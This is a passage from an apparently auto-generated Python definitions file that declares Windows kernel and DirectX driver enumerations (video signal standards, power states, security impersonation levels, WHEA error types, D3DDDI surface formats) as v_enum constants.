D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_EIA_861 = 25
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_EIA_861A = 26
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_EIA_861B = 27
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_K = 28
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_K1 = 29
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_L = 30
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_PAL_M = 31
D3DKMDT_VIDEO_SIGNAL_STANDARD.D3DKMDT_VSS_OTHER = 255
D3DKMDT_MONITOR_FREQUENCY_RANGE_CONSTRAINT = v_enum()
D3DKMDT_MONITOR_FREQUENCY_RANGE_CONSTRAINT.D3DKMDT_MFRC_UNINITIALIZED = 0
D3DKMDT_MONITOR_FREQUENCY_RANGE_CONSTRAINT.D3DKMDT_MFRC_ACTIVESIZE = 1
D3DKMDT_MONITOR_FREQUENCY_RANGE_CONSTRAINT.D3DKMDT_MFRC_MAXPIXELRATE = 2
WINDOW_ARRANGEMENT_COMMAND = v_enum()
WINDOW_ARRANGEMENT_COMMAND.WARR_MOVE_FIRST = 10
WINDOW_ARRANGEMENT_COMMAND.WARR_RESTORE_UP = 10
WINDOW_ARRANGEMENT_COMMAND.WARR_RESTORE_DOWN = 11
WINDOW_ARRANGEMENT_COMMAND.WARR_VRESTORE_UP = 12
WINDOW_ARRANGEMENT_COMMAND.WARR_VRESTORE_DOWN = 13
WINDOW_ARRANGEMENT_COMMAND.WARR_VMAXIMIZE_RIGHT = 14
WINDOW_ARRANGEMENT_COMMAND.WARR_VMAXIMIZE_LEFT = 15
WINDOW_ARRANGEMENT_COMMAND.WARR_MOVE_NEXT_MONITOR_LEFT = 16
WINDOW_ARRANGEMENT_COMMAND.WARR_MOVE_NEXT_MONITOR_RIGHT = 17
WINDOW_ARRANGEMENT_COMMAND.WARR_MOVE_LAST = 18
OB_OPEN_REASON = v_enum()
OB_OPEN_REASON.ObCreateHandle = 0
OB_OPEN_REASON.ObOpenHandle = 1
OB_OPEN_REASON.ObDuplicateHandle = 2
OB_OPEN_REASON.ObInheritHandle = 3
OB_OPEN_REASON.ObMaxOpenReason = 4
DMM_MODE_PRUNING_ALGORITHM = v_enum()
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_UNINITIALIZED = 0
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_GDI = 1
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_VISTA = 2
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_GDI_VISTA_UNION = 3
DMM_MODE_PRUNING_ALGORITHM.DMM_MPA_MAXVALID = 3
MODE = v_enum()
MODE.KernelMode = 0
MODE.UserMode = 1
MODE.MaximumMode = 2
POWER_STATE_TYPE = v_enum()
POWER_STATE_TYPE.SystemPowerState = 0
POWER_STATE_TYPE.DevicePowerState = 1
IRQ_PRIORITY = v_enum()
IRQ_PRIORITY.IrqPriorityUndefined = 0
IRQ_PRIORITY.IrqPriorityLow = 1
IRQ_PRIORITY.IrqPriorityNormal = 2
IRQ_PRIORITY.IrqPriorityHigh = 3
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS = v_enum()
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassMinimum = 0
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassLow = 1
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassNormal = 2
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassHigh = 3
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_AllocationPriorityClassMaximum = 4
D3DKMT_QUERYSTATISTICS_ALLOCATION_PRIORITY_CLASS.D3DKMT_MaxAllocationPriorityClass = 5
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN = v_enum()
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_UNINITIALIZED = 0
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_DEFAULTMONITORPROFILE = 1
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_MONITORDESCRIPTOR = 2
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_MONITORDESCRIPTOR_REGISTRYOVERRIDE = 3
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_SPECIFICCAP_REGISTRYOVERRIDE = 4
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_DRIVER = 5
D3DKMDT_MONITOR_CAPABILITIES_ORIGIN.D3DKMDT_MCO_MAXVALID = 5
D3DKMDT_PIXEL_VALUE_ACCESS_MODE = v_enum()
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_UNINITIALIZED = 0
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_DIRECT = 1
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_PRESETPALETTE = 2
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_SETTABLEPALETTE = 3
D3DKMDT_PIXEL_VALUE_ACCESS_MODE.D3DKMDT_PVAM_MAXVALID = 3
D3DKMDT_TEXT_RENDERING_FORMAT = v_enum()
D3DKMDT_TEXT_RENDERING_FORMAT.D3DKMDT_TRF_UNINITIALIZED = 0
RTL_GENERIC_COMPARE_RESULTS = v_enum()
RTL_GENERIC_COMPARE_RESULTS.GenericLessThan = 0
RTL_GENERIC_COMPARE_RESULTS.GenericGreaterThan = 1
RTL_GENERIC_COMPARE_RESULTS.GenericEqual = 2
SYSTEM_POWER_STATE = v_enum()
SYSTEM_POWER_STATE.PowerSystemUnspecified = 0
SYSTEM_POWER_STATE.PowerSystemWorking = 1
SYSTEM_POWER_STATE.PowerSystemSleeping1 = 2
SYSTEM_POWER_STATE.PowerSystemSleeping2 = 3
SYSTEM_POWER_STATE.PowerSystemSleeping3 = 4
SYSTEM_POWER_STATE.PowerSystemHibernate = 5
SYSTEM_POWER_STATE.PowerSystemShutdown = 6
SYSTEM_POWER_STATE.PowerSystemMaximum = 7
D3DKMDT_VIDPN_SOURCE_MODE_TYPE = v_enum()
D3DKMDT_VIDPN_SOURCE_MODE_TYPE.D3DKMDT_RMT_UNINITIALIZED = 0
D3DKMDT_VIDPN_SOURCE_MODE_TYPE.D3DKMDT_RMT_GRAPHICS = 1
D3DKMDT_VIDPN_SOURCE_MODE_TYPE.D3DKMDT_RMT_TEXT = 2
IO_ALLOCATION_ACTION = v_enum()
IO_ALLOCATION_ACTION.KeepObject = 1
IO_ALLOCATION_ACTION.DeallocateObject = 2
IO_ALLOCATION_ACTION.DeallocateObjectKeepRegisters = 3
EXCEPTION_DISPOSITION = v_enum()
EXCEPTION_DISPOSITION.ExceptionContinueExecution = 0
EXCEPTION_DISPOSITION.ExceptionContinueSearch = 1
EXCEPTION_DISPOSITION.ExceptionNestedException = 2
EXCEPTION_DISPOSITION.ExceptionCollidedUnwind = 3
D3DKMDT_VIDPN_PRESENT_PATH_SCALING = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_IDENTITY = 1
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_CENTERED = 2
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_STRETCHED = 3
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_ASPECTRATIOCENTEREDMAX = 4
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_CUSTOM = 5
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_RESERVED1 = 253
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_UNPINNED = 254
D3DKMDT_VIDPN_PRESENT_PATH_SCALING.D3DKMDT_VPPS_NOTSPECIFIED = 255
D3DDDI_GAMMARAMP_TYPE = v_enum()
D3DDDI_GAMMARAMP_TYPE.D3DDDI_GAMMARAMP_UNINITIALIZED = 0
D3DDDI_GAMMARAMP_TYPE.D3DDDI_GAMMARAMP_DEFAULT = 1
D3DDDI_GAMMARAMP_TYPE.D3DDDI_GAMMARAMP_RGB256x3x16 = 2
D3DDDI_GAMMARAMP_TYPE.D3DDDI_GAMMARAMP_DXGI_1 = 3
SECURITY_OPERATION_CODE = v_enum()
SECURITY_OPERATION_CODE.SetSecurityDescriptor = 0
SECURITY_OPERATION_CODE.QuerySecurityDescriptor = 1
SECURITY_OPERATION_CODE.DeleteSecurityDescriptor = 2
SECURITY_OPERATION_CODE.AssignSecurityDescriptor = 3
WHEA_ERROR_PACKET_DATA_FORMAT = v_enum()
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatIPFSalRecord = 0
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatXPFMCA = 1
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatMemory = 2
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatPCIExpress = 3
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatNMIPort = 4
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatPCIXBus = 5
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatPCIXDevice = 6
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatGeneric = 7
WHEA_ERROR_PACKET_DATA_FORMAT.WheaDataFormatMax = 8
DISPLAYCONFIG_SCANLINE_ORDERING = v_enum()
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_UNSPECIFIED = 0
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_PROGRESSIVE = 1
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_INTERLACED = 2
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_INTERLACED_UPPERFIELDFIRST = 2
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_INTERLACED_LOWERFIELDFIRST = 3
DISPLAYCONFIG_SCANLINE_ORDERING.DISPLAYCONFIG_SCANLINE_ORDERING_FORCE_UINT32 = -1
TP_CALLBACK_PRIORITY = v_enum()
TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_HIGH = 0
TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_NORMAL = 1
TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_LOW = 2
TP_CALLBACK_PRIORITY.TP_CALLBACK_PRIORITY_INVALID = 3
SECURITY_IMPERSONATION_LEVEL = v_enum()
SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous = 0
SECURITY_IMPERSONATION_LEVEL.SecurityIdentification = 1
SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation = 2
SECURITY_IMPERSONATION_LEVEL.SecurityDelegation = 3
DEVICE_USAGE_NOTIFICATION_TYPE = v_enum()
DEVICE_USAGE_NOTIFICATION_TYPE.DeviceUsageTypeUndefined = 0
DEVICE_USAGE_NOTIFICATION_TYPE.DeviceUsageTypePaging = 1
DEVICE_USAGE_NOTIFICATION_TYPE.DeviceUsageTypeHibernation = 2
DEVICE_USAGE_NOTIFICATION_TYPE.DeviceUsageTypeDumpFile = 3
D3DKMDT_COLOR_BASIS = v_enum()
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_UNINITIALIZED = 0
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_INTENSITY = 1
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_SRGB = 2
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_SCRGB = 3
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_YCBCR = 4
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_YPBPR = 5
D3DKMDT_COLOR_BASIS.D3DKMDT_CB_MAXVALID = 5
DXGK_RECOMMENDFUNCTIONALVIDPN_REASON = v_enum()
DXGK_RECOMMENDFUNCTIONALVIDPN_REASON.DXGK_RFVR_UNINITIALIZED = 0
DXGK_RECOMMENDFUNCTIONALVIDPN_REASON.DXGK_RFVR_HOTKEY = 1
DXGK_RECOMMENDFUNCTIONALVIDPN_REASON.DXGK_RFVR_USERMODE = 2
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT = v_enum()
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttempt = 0
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptSuccess = 1
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissNoCommand = 2
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissNotEnabled = 3
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissNextFence = 4
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissPagingCommand = 5
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissSplittedCommand = 6
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissFenceCommand = 7
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissRenderPendingFlip = 8
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissNotMakingProgress = 9
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissLessPriority = 10
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissRemainingQuantum = 11
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissRemainingPreemptionQuantum = 12
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissAlreadyPreempting = 13
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissGlobalBlock = 14
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptMissAlreadyRunning = 15
D3DKMT_QUERYRESULT_PREEMPTION_ATTEMPT_RESULT.D3DKMT_PreemptionAttemptStatisticsMax = 16
INTERFACE_TYPE = v_enum()
INTERFACE_TYPE.InterfaceTypeUndefined = -1
INTERFACE_TYPE.Internal = 0
INTERFACE_TYPE.Isa = 1
INTERFACE_TYPE.Eisa = 2
INTERFACE_TYPE.MicroChannel = 3
INTERFACE_TYPE.TurboChannel = 4
INTERFACE_TYPE.PCIBus = 5
INTERFACE_TYPE.VMEBus = 6
INTERFACE_TYPE.NuBus = 7
INTERFACE_TYPE.PCMCIABus = 8
INTERFACE_TYPE.CBus = 9
INTERFACE_TYPE.MPIBus = 10
INTERFACE_TYPE.MPSABus = 11
INTERFACE_TYPE.ProcessorInternal = 12
INTERFACE_TYPE.InternalPowerBus = 13
INTERFACE_TYPE.PNPISABus = 14
INTERFACE_TYPE.PNPBus = 15
INTERFACE_TYPE.Vmcs = 16
INTERFACE_TYPE.MaximumInterfaceType = 17
ALTERNATIVE_ARCHITECTURE_TYPE = v_enum()
ALTERNATIVE_ARCHITECTURE_TYPE.StandardDesign = 0
ALTERNATIVE_ARCHITECTURE_TYPE.NEC98x86 = 1
ALTERNATIVE_ARCHITECTURE_TYPE.EndAlternatives = 2
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_IDENTITY = 1
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_ROTATE90 = 2
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_ROTATE180 = 3
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_ROTATE270 = 4
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_UNPINNED = 254
D3DKMDT_VIDPN_PRESENT_PATH_ROTATION.D3DKMDT_VPPR_NOTSPECIFIED = 255
WHEA_ERROR_TYPE = v_enum()
WHEA_ERROR_TYPE.WheaErrTypeProcessor = 0
WHEA_ERROR_TYPE.WheaErrTypeMemory = 1
WHEA_ERROR_TYPE.WheaErrTypePCIExpress = 2
WHEA_ERROR_TYPE.WheaErrTypeNMI = 3
WHEA_ERROR_TYPE.WheaErrTypePCIXBus = 4
WHEA_ERROR_TYPE.WheaErrTypePCIXDevice = 5
WHEA_ERROR_TYPE.WheaErrTypeGeneric = 6
DXGK_DIAG_TYPE = v_enum()
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_NONE = 0
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_SDC = 1
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_HPD = 2
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_DC_ORIGIN = 3
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_USER_CDS = 4
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_DRV_CDS = 5
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_CODE_POINT = 6
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_QDC = 7
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_MONITOR_MGR = 8
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_CONNECTEDSET_NOT_FOUND = 9
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_DISPDIAG_COLLECTED = 10
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_BML_PACKET = 11
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_BML_PACKET_EX = 12
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_COMMIT_VIDPN_FAILED = 13
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_DRIVER_RECOMMEND_VIDPN = 14
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_MAX = 14
DXGK_DIAG_TYPE.DXGK_DIAG_TYPE_FORCE_UINT32 = -1
ReplacesCorHdrNumericDefines = v_enum()
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_ILONLY = 1
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_32BITREQUIRED = 2
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_IL_LIBRARY = 4
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_STRONGNAMESIGNED = 8
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_NATIVE_ENTRYPOINT = 16
ReplacesCorHdrNumericDefines.COMIMAGE_FLAGS_TRACKDEBUGDATA = 65536
ReplacesCorHdrNumericDefines.COR_VERSION_MAJOR_V2 = 2
ReplacesCorHdrNumericDefines.COR_VERSION_MAJOR = 2
ReplacesCorHdrNumericDefines.COR_VERSION_MINOR = 0
ReplacesCorHdrNumericDefines.COR_DELETED_NAME_LENGTH = 8
ReplacesCorHdrNumericDefines.COR_VTABLEGAP_NAME_LENGTH = 8
ReplacesCorHdrNumericDefines.NATIVE_TYPE_MAX_CB = 1
ReplacesCorHdrNumericDefines.COR_ILMETHOD_SECT_SMALL_MAX_DATASIZE = 255
ReplacesCorHdrNumericDefines.IMAGE_COR_MIH_METHODRVA = 1
ReplacesCorHdrNumericDefines.IMAGE_COR_MIH_EHRVA = 2
ReplacesCorHdrNumericDefines.IMAGE_COR_MIH_BASICBLOCK = 8
ReplacesCorHdrNumericDefines.COR_VTABLE_32BIT = 1
ReplacesCorHdrNumericDefines.COR_VTABLE_64BIT = 2
ReplacesCorHdrNumericDefines.COR_VTABLE_FROM_UNMANAGED = 4
ReplacesCorHdrNumericDefines.COR_VTABLE_FROM_UNMANAGED_RETAIN_APPDOMAIN = 8
ReplacesCorHdrNumericDefines.COR_VTABLE_CALL_MOST_DERIVED = 16
ReplacesCorHdrNumericDefines.IMAGE_COR_EATJ_THUNK_SIZE = 32
ReplacesCorHdrNumericDefines.MAX_CLASS_NAME = 1024
ReplacesCorHdrNumericDefines.MAX_PACKAGE_NAME = 1024
D3DKMDT_MODE_PREFERENCE = v_enum()
D3DKMDT_MODE_PREFERENCE.D3DKMDT_MP_UNINITIALIZED = 0
D3DKMDT_MODE_PREFERENCE.D3DKMDT_MP_PREFERRED = 1
D3DKMDT_MODE_PREFERENCE.D3DKMDT_MP_NOTPREFERRED = 2
D3DKMDT_MODE_PREFERENCE.D3DKMDT_MP_MAXVALID = 2
EX_POOL_PRIORITY = v_enum()
EX_POOL_PRIORITY.LowPoolPriority = 0
EX_POOL_PRIORITY.LowPoolPrioritySpecialPoolOverrun = 8
EX_POOL_PRIORITY.LowPoolPrioritySpecialPoolUnderrun = 9
EX_POOL_PRIORITY.NormalPoolPriority = 16
EX_POOL_PRIORITY.NormalPoolPrioritySpecialPoolOverrun = 24
EX_POOL_PRIORITY.NormalPoolPrioritySpecialPoolUnderrun = 25
EX_POOL_PRIORITY.HighPoolPriority = 32
EX_POOL_PRIORITY.HighPoolPrioritySpecialPoolOverrun = 40
EX_POOL_PRIORITY.HighPoolPrioritySpecialPoolUnderrun = 41
eTHRESHOLD_MARGIN_DIRECTION = v_enum()
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginTop = 0
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginLeft = 1
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginRight = 2
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginBottom = 3
eTHRESHOLD_MARGIN_DIRECTION.ThresholdMarginMax = 4
MOVERECT_STYLE = v_enum()
MOVERECT_STYLE.MoveRectKeepPositionAtCursor = 0
MOVERECT_STYLE.MoveRectMidTopAtCursor = 1
MOVERECT_STYLE.MoveRectKeepAspectRatioAtCursor = 2
MOVERECT_STYLE.MoveRectSidewiseKeepPositionAtCursor = 3
D3DDDIFORMAT = v_enum()
D3DDDIFORMAT.D3DDDIFMT_UNKNOWN = 0
D3DDDIFORMAT.D3DDDIFMT_R8G8B8 = 20
D3DDDIFORMAT.D3DDDIFMT_A8R8G8B8 = 21
D3DDDIFORMAT.D3DDDIFMT_X8R8G8B8 = 22
D3DDDIFORMAT.D3DDDIFMT_R5G6B5 = 23
D3DDDIFORMAT.D3DDDIFMT_X1R5G5B5 = 24
D3DDDIFORMAT.D3DDDIFMT_A1R5G5B5 = 25
D3DDDIFORMAT.D3DDDIFMT_A4R4G4B4 = 26
D3DDDIFORMAT.D3DDDIFMT_R3G3B2 = 27
D3DDDIFORMAT.D3DDDIFMT_A8 = 28
D3DDDIFORMAT.D3DDDIFMT_A8R3G3B2 = 29
D3DDDIFORMAT.D3DDDIFMT_X4R4G4B4 = 30
D3DDDIFORMAT.D3DDDIFMT_A2B10G10R10 = 31
D3DDDIFORMAT.D3DDDIFMT_A8B8G8R8 = 32
D3DDDIFORMAT.D3DDDIFMT_X8B8G8R8 = 33
D3DDDIFORMAT.D3DDDIFMT_G16R16 = 34
D3DDDIFORMAT.D3DDDIFMT_A2R10G10B10 = 35
D3DDDIFORMAT.D3DDDIFMT_A16B16G16R16 = 36
D3DDDIFORMAT.D3DDDIFMT_A8P8 = 40
D3DDDIFORMAT.D3DDDIFMT_P8 = 41
D3DDDIFORMAT.D3DDDIFMT_L8 = 50
D3DDDIFORMAT.D3DDDIFMT_A8L8 = 51
D3DDDIFORMAT.D3DDDIFMT_A4L4 = 52
D3DDDIFORMAT.D3DDDIFMT_V8U8 = 60
D3DDDIFORMAT.D3DDDIFMT_L6V5U5 = 61
D3DDDIFORMAT.D3DDDIFMT_X8L8V8U8 = 62
D3DDDIFORMAT.D3DDDIFMT_Q8W8V8U8 = 63
D3DDDIFORMAT.D3DDDIFMT_V16U16 = 64
D3DDDIFORMAT.D3DDDIFMT_W11V11U10 = 65
D3DDDIFORMAT.D3DDDIFMT_A2W10V10U10 = 67
D3DDDIFORMAT.D3DDDIFMT_UYVY = 1498831189
D3DDDIFORMAT.D3DDDIFMT_R8G8_B8G8 = 1195525970
D3DDDIFORMAT.D3DDDIFMT_YUY2 = 844715353
D3DDDIFORMAT.D3DDDIFMT_G8R8_G8B8 = 1111970375
D3DDDIFORMAT.D3DDDIFMT_DXT1 = 827611204
D3DDDIFORMAT.D3DDDIFMT_DXT2 = 844388420
D3DDDIFORMAT.D3DDDIFMT_DXT3 = 861165636
D3DDDIFORMAT.D3DDDIFMT_DXT4 = 877942852
D3DDDIFORMAT.D3DDDIFMT_DXT5 = 894720068
D3DDDIFORMAT.D3DDDIFMT_D16_LOCKABLE = 70
D3DDDIFORMAT.D3DDDIFMT_D32 = 71
D3DDDIFORMAT.D3DDDIFMT_D15S1 = 73
D3DDDIFORMAT.D3DDDIFMT_D24S8 = 75
D3DDDIFORMAT.D3DDDIFMT_D24X8 = 77
D3DDDIFORMAT.D3DDDIFMT_D24X4S4 = 79
D3DDDIFORMAT.D3DDDIFMT_D16 = 80
D3DDDIFORMAT.D3DDDIFMT_D32F_LOCKABLE = 82
D3DDDIFORMAT.D3DDDIFMT_D24FS8 = 83
D3DDDIFORMAT.D3DDDIFMT_D32_LOCKABLE = 84
D3DDDIFORMAT.D3DDDIFMT_S8_LOCKABLE = 85
D3DDDIFORMAT.D3DDDIFMT_S1D15 = 72
D3DDDIFORMAT.D3DDDIFMT_S8D24 = 74
D3DDDIFORMAT.D3DDDIFMT_X8D24 = 76
D3DDDIFORMAT.D3DDDIFMT_X4S4D24 = 78
D3DDDIFORMAT.D3DDDIFMT_L16 = 81
D3DDDIFORMAT.D3DDDIFMT_VERTEXDATA = 100
D3DDDIFORMAT.D3DDDIFMT_INDEX16 = 101
D3DDDIFORMAT.D3DDDIFMT_INDEX32 = 102
D3DDDIFORMAT.D3DDDIFMT_Q16W16V16U16 = 110
D3DDDIFORMAT.D3DDDIFMT_MULTI2_ARGB8 = 827606349
D3DDDIFORMAT.D3DDDIFMT_R16F = 111
D3DDDIFORMAT.D3DDDIFMT_G16R16F = 112
D3DDDIFORMAT.D3DDDIFMT_A16B16G16R16F = 113
D3DDDIFORMAT.D3DDDIFMT_R32F = 114
D3DDDIFORMAT.D3DDDIFMT_G32R32F = 115
D3DDDIFORMAT.D3DDDIFMT_A32B32G32R32F = 116
D3DDDIFORMAT.D3DDDIFMT_CxV8U8 = 117
D3DDDIFORMAT.D3DDDIFMT_A1 = 118
D3DDDIFORMAT.D3DDDIFMT_A2B10G10R10_XR_BIAS = 119
D3DDDIFORMAT.D3DDDIFMT_DXVACOMPBUFFER_BASE = 150
D3DDDIFORMAT.D3DDDIFMT_PICTUREPARAMSDATA = 150
D3DDDIFORMAT.D3DDDIFMT_MACROBLOCKDATA = 151
D3DDDIFORMAT.D3DDDIFMT_RESIDUALDIFFERENCEDATA = 152
D3DDDIFORMAT.D3DDDIFMT_DEBLOCKINGDATA = 153
D3DDDIFORMAT.D3DDDIFMT_INVERSEQUANTIZATIONDATA = 154
D3DDDIFORMAT.D3DDDIFMT_SLICECONTROLDATA = 155
D3DDDIFORMAT.D3DDDIFMT_BITSTREAMDATA = 156
D3DDDIFORMAT.D3DDDIFMT_MOTIONVECTORBUFFER = 157
D3DDDIFORMAT.D3DDDIFMT_FILMGRAINBUFFER = 158
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED9 = 159
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED10 = 160
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED11 = 161
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED12 = 162
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED13 = 163
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED14 = 164
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED15 = 165
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED16 = 166
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED17 = 167
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED18 = 168
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED19 = 169
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED20 = 170
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED21 = 171
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED22 = 172
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED23 = 173
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED24 = 174
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED25 = 175
D3DDDIFORMAT.D3DDDIFMT_DXVA_RESERVED26 = 176
